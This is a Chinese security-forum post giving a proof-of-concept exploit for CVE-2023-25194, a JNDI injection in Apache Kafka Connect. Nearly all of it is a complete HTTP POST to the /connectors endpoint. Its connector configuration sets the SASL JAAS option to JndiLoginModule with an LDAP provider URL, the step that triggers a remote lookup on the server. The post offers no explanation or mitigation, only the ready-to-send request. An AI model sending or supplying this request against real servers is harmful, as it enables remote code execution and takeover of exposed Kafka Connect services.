请选择 进入手机版 | 继续访问电脑版
查看: 5162|回复: 0

POC-Apache Kafka Connect 模块JNDI注入

[复制链接]
  • TA的每日心情

    昨天 10:03
  • 签到天数: 1586 天

    [LV.Master]伴坛终老

    发表于 2023-3-23 11:17:56 | 显示全部楼层 |阅读模式
    CVE-2023-25194   POC

    [AppleScript] 纯文本查看 复制代码
    POST /connectors HTTP/1.1
    Host: xxxx:8083
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Content-Type: application/json
    Connection: close
    Content-Length: 1109
    
    {"name": "test", 
       "config":
        {
            "connector.class":"io.debezium.connector.mysql.MySqlConnector",
        	"database.hostname": "xxxxx",
        	"database.port": "3306",
        	"database.user": "root",
        	"database.password": "xxxxxx",
        	"database.dbname": "xxxx",
        	"database.sslmode": "SSL_MODE",
            "database.server.id": "1234",
        	"database.server.name": "localhost",
            "table.include.list": "MYSQL_TABLES",
        	"tasks.max":"1",
            "topic.prefix": "aaa22",
            "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
            "schema.history.internal.kafka.topic": "aaa22",
            "schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
        	"database.history.producer.security.protocol": "SASL_SSL",
        	"database.history.producer.sasl.mechanism": "PLAIN",
        	"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
        }
    }
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-6-16 05:10 , Processed in 0.025391 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部